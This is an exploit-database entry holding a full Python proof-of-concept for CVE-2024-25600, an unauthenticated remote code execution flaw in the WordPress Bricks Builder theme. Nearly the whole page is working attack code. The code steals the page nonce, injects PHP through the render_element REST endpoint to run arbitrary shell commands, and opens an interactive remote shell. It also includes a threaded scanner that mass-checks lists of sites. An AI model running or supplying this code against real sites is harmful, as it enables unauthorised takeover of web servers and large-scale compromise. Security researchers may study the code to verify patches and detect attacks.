Share
## https://sploitus.com/exploit?id=PACKETSTORM:225257
# Exploit Title: WordPress Bricks Builder Theme - RCE
# Date: 2026-06-25
# Exploit Author: Jared Brits (K3ysTr0K3R)
# Vendor Homepage: https://bricksbuilder.io/
# Software Link: https://bricksbuilder.io/
# Version: Bricks Builder <= 1.9.6
# Tested On: Kali Linux 2026.1 / WordPress 6.7
# CVE: CVE-2024-25600
# Description: Unauthenticated RCE vulnerability in Bricks Builder theme's
# render_element endpoint. Extracts nonce from page source and
# executes arbitrary commands on vulnerable WordPress installations.
import re
import requests
import argparse
import threading
from bs4 import BeautifulSoup
from rich.console import Console
from prompt_toolkit import PromptSession, HTML
from prompt_toolkit.history import InMemoryHistory
from prompt_toolkit.auto_suggest import AutoSuggestFromHistory
from concurrent.futures import ThreadPoolExecutor, as_completed
from alive_progress import alive_bar
color = Console()
def ascii_art():
color.print("""[yellow]
_______ ________ ___ ____ ___ __ __ ___ ___________ ____ ____
/ ____/ | / / ____/ |__ \ / __ \__ \/ // / |__ \ / ____/ ___// __ \/ __ \\
/ / | | / / __/________/ // / / /_/ / // /_________/ //___ \/ __ \/ / / / / / /
/ /___ | |/ / /__/_____/ __// /_/ / __/__ __/_____/ __/____/ / /_/ / /_/ / /_/ /
\____/ |___/_____/ /____/\____/____/ /_/ /____/_____/\____/\____/\____/
[/yellow]""", style="bold")
print("Coded By: Jared Brits (K3ysTr0K3R) --> Hello, Friend!")
print("")
headers = {
"Content-Type": "application/json",
"User-Agent": "Mozilla/5.0 (Linux; Android 11; SM-G960U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Mobile Safari/537.36"
}
paths = [
"/wp-json/bricks/v1/render_element",
"/?rest_route=/bricks/v1/render_element"
]
requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)
def fetch_nonce(target):
try:
response = requests.get(target, verify=False, timeout=10)
response.raise_for_status()
soup = BeautifulSoup(response.text, "html.parser")
script_tag = soup.find("script", id="bricks-scripts-js-extra")
if script_tag:
match = re.search(r'"nonce":"([a-f0-9]+)"', script_tag.string)
if match:
nonce = match.group(1)
return nonce
except Exception:
return None
def interactive_shell(target, nonce):
color.print("[bold bright_green][+][/bold bright_green] Interactive shell opened successfully")
session = PromptSession(history=InMemoryHistory())
for vulnerable_path in paths:
while True:
try:
command = session.prompt(
HTML("<ansired><b>Shell> </b></ansired>"),
auto_suggest=AutoSuggestFromHistory(),
)
if command.lower() == "exit":
return
vulnerable_data = create_vulnerable_data(nonce, command)
response = requests.post(target + vulnerable_path, headers=headers, json=vulnerable_data, verify=False, timeout=10)
output = response.json().get('data').get('html')
cleaned_output = output.replace("Exception: ", "")
print(cleaned_output)
except KeyboardInterrupt:
return
def create_vulnerable_data(nonce, command):
return {
"postId": "1",
"nonce": nonce,
"element": {
"name": "code",
"settings": {
"executeCode": "true",
"code": f"<?php throw new Exception(`{command}`);?>"
}
}
}
def exploit(target):
nonce = fetch_nonce(target)
if nonce:
elements = [create_element(nonce) for _ in range(4)]
for path, element in zip(paths, elements):
if exploit_successful(target, path, element):
interactive_shell(target, nonce)
break
def exploit_successful(target, path, element):
color.print("[bold bright_blue][*][/bold bright_blue] Checking if the target is vulnerable")
try:
response = requests.post(target + path, headers=headers, json=element, verify=False, timeout=10)
response.raise_for_status()
if response.status_code == 200 and 'KHABuhwxnUHDDW' in response.text:
color.print("[bold bright_green][+][/bold bright_green] The target is vulnerable")
color.print(f"[bold bright_blue][*][/bold bright_blue] Initiating exploit against: [bold cyan]{target}[/bold cyan]")
color.print("[bold bright_blue][*][/bold bright_blue] Initiating interactive shell")
return True
else:
color.print("[bold bright_red][~][/bold bright_red] The target does not appear to be vulnerable")
exit()
except requests.exceptions.HTTPError:
color.print("[bold bright_red][~][/bold bright_red] The target does not appear to be vulnerable")
return False
def create_element(nonce):
return {
"postId": "1",
"nonce": nonce,
"element": {
"name": "container",
"settings": {
"hasLoop": "true",
"query": {
"useQueryEditor": True,
"queryEditor": "throw new Exception(`echo KHABuhwxnUHDDW`);",
"objectType": "post"
}
}
}
}
def scanner(target, nonce):
for path in paths:
try:
response = requests.post(target + path, headers=headers, json=create_element(nonce), verify=False, timeout=10)
response.raise_for_status()
if response.status_code == 200 and 'KHABuhwxnUHDDW' in response.text:
color.print(f"[bold bright_green][+][/bold bright_green] Identified vulnerability in target: [bold cyan]{target}[/bold cyan]")
break
except Exception:
pass
def threaded_scanner(url, nonce):
if nonce:
scanner(url, nonce)
def scan_file(target_file, threads):
with open(target_file, "r") as url_file:
urls = [url.strip() for url in url_file if url.strip()]
if not urls:
color.print("[bold bright_red][~][/bold bright_red] No URLs found in the file.")
return
max_threads = threads
semaphore = threading.Semaphore(value=max_threads)
def thread_task(url):
nonce = fetch_nonce(url)
with semaphore:
threaded_scanner(url, nonce)
bar()
threads = []
with alive_bar(len(urls), title="Scanning Targets", bar="smooth", enrich_print=False) as bar:
for url in urls:
thread = threading.Thread(target=thread_task, args=(url,))
threads.append(thread)
thread.start()
for thread in threads:
thread.join()
def main():
ascii_art()
parser = argparse.ArgumentParser(description='A PoC exploit for CVE-2024-25600 - WordPress Bricks Builder Unauthenticated Remote Code Execution (RCE)')
parser.add_argument('-u', '--url', help='Target URL to exploit')
parser.add_argument('-t', '--threads', type=int, default=1, help='Adjust threading to your needs')
parser.add_argument('-f', '--file', help='File containing URLs to scan')
args = parser.parse_args()
if args.url:
exploit(args.url)
elif args.file:
scan_file(args.file, args.threads)
else:
parser.print_help()
if __name__ == "__main__":
main()